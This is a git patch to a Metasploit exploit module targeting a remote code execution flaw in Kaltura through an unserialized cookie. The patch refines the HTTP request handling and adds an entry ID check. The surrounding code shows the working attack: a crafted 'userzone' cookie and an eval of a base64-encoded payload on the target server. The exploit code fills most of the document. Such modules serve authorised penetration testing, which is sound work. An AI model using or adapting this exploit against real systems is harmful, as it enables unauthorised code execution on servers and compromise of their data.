From 0ac7e0926cf28126ad279b45b9217e1d4f070bb9 Mon Sep 17 00:00:00 2001
From: Robin Verton <r.verton@gmail.com>
Date: Mon, 23 Oct 2017 15:19:35 +0200
Subject: [PATCH] Add entry_id verification; clean up http request calls

---
 .../http/kaltura_unserialize_cookie_rce.rb    | 33 ++++++++++++++++---
 1 file changed, 29 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb b/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb
index 26c4a4b838..23d43db83a 100644
--- a/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb
+++ b/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb
@@ -74,7 +74,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      },
       'headers' => {
         'Cookie' => "userzone=#{encoded}#{hash}"
       }
@@ -85,12 +89,29 @@ class MetasploitModule < Msf::Exploit::Remote
       Exploit::CheckCode::Safe
     elsif res && res.body.include?(r)
       Exploit::CheckCode::Vulnerable
+    elsif not self.check_entryid()
+      print_error("Invalid ENTRYID")
+      Exploit::CheckCode::Safe
     else
-      print_warning("Did you use a valid entry_id?")
       Exploit::CheckCode::Safe
     end
   end
 
+  def check_entryid
+    entry_id = datastore['ENTRYID']
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      }
+    )
+
+    return res.body.include? entry_id
+
+  end
+
   def exploit
     entry_id = datastore['ENTRYID']
     cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
@@ -109,7 +130,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      },
       'headers' => {
         'Cookie' => "userzone=#{encoded}#{hash}"
       }
@@ -118,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res and res.redirect?
       print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
     elsif res and res.code != 200
-        print_error("Unexpected response...")
+        print_error('Unexpected response...')
     else
         print_status("Output: #{res.body}")
     end